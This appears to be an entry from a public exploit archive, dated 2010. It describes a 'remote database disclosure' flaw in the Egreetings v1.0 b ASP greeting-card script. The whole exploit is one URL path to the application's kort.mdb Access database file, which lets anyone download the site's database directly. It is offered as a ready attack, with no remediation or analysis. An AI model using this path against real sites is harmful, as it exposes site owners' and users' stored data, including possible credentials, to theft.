id: 10648
date: 01/10/2010
title: Egreetings v1.0 b Remote Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

==========================================================
Egreetings v1.0 b Remote Database Disclosure Vulnerability
==========================================================


    [»] Script:             [ Egreetings ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Systeme d envoie de cartes de voeux ]

###########################################################################
 
===[ Exploit ]===
 
    [»] http://server/[path]/kort.mdb
 
Author: ViRuSMaN <-



#  0day.today [2023-03-26]  #